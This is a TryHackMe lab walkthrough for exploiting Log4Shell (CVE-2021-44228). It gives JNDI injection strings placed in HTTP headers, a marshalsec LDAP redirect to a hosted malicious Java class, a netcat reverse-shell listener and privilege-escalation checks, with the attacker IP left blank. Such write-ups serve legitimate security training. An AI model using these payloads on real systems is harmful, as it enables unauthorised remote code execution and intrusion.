Share
## https://sploitus.com/exploit?id=C071F1E9-E9BE-51B2-9D97-C4FEB0E50E18
# ๐Ÿ”ฅ Solar Exploiting Log4j - TryHackMe Walkthrough

## ๐Ÿ“Œ Room: Solar Exploiting Log4j

Platform: TryHackMe
Difficulty: Medium
Topic: Log4Shell (Log4j Vulnerability)

---

## ๐Ÿง  Objective

Exploit the Log4j vulnerability (CVE-2021-44228) to gain remote code execution and capture flags.

---

## ๐Ÿ› ๏ธ Tools Used

* Nmap
* Burp Suite
* cURL
* Netcat
* Python HTTP Server

---

## ๐ŸŒ Step 1: Reconnaissance

### ๐Ÿ” Scan Target

```bash
nmap -sC -sV 
```

### ๐Ÿ“Œ Findings

* Open ports: 80 (HTTP), others depending on room
* Web application running Java-based backend

---

## ๐ŸŒ Step 2: Web Enumeration

* Visit the web app in browser
* Interact with inputs (login/search/header fields)
* Capture request using Burp Suite

---

## ๐Ÿ’ฅ Step 3: Identify Log4j Vulnerability

Log4j vulnerability allows JNDI injection:

```
${jndi:ldap://:1389/a}
```

If input is logged โ†’ vulnerability exists.

---

## โš™๏ธ Step 4: Setup Listener

### Start Netcat

```bash
nc -lvnp 4444
```

### Start Malicious LDAP Server (Example)

```bash
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
```

Run LDAP server:

```bash
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://:8000/#Exploit" 1389
```

---

## ๐Ÿ“ก Step 5: Host Payload

```bash
python3 -m http.server 8000
```

Create malicious Java class (Exploit.class)

---

## ๐Ÿš€ Step 6: Trigger Exploit

Inject payload into vulnerable field:

```
${jndi:ldap://:1389/Exploit}
```

๐Ÿ’ก Use headers like:

* User-Agent
* X-Api-Version

---

## ๐Ÿ–ฅ๏ธ Step 7: Gain Reverse Shell

Once triggered:

* Target connects back to Netcat listener
* You get shell access

---

## ๐Ÿ” Step 8: Privilege Escalation (if required)

Check:

```bash
sudo -l
```

Look for:

* Misconfigured SUID binaries
* Writable files
* Cron jobs

---

## ๐Ÿšฉ Step 9: Capture Flags

```bash
find / -name flag.txt 2>/dev/null
cat flag.txt
```

## ๐Ÿงพ Key Concepts Learned

* Log4Shell (CVE-2021-44228)
* JNDI Injection
* Remote Code Execution (RCE)
* Reverse Shell
* Web Exploitation

---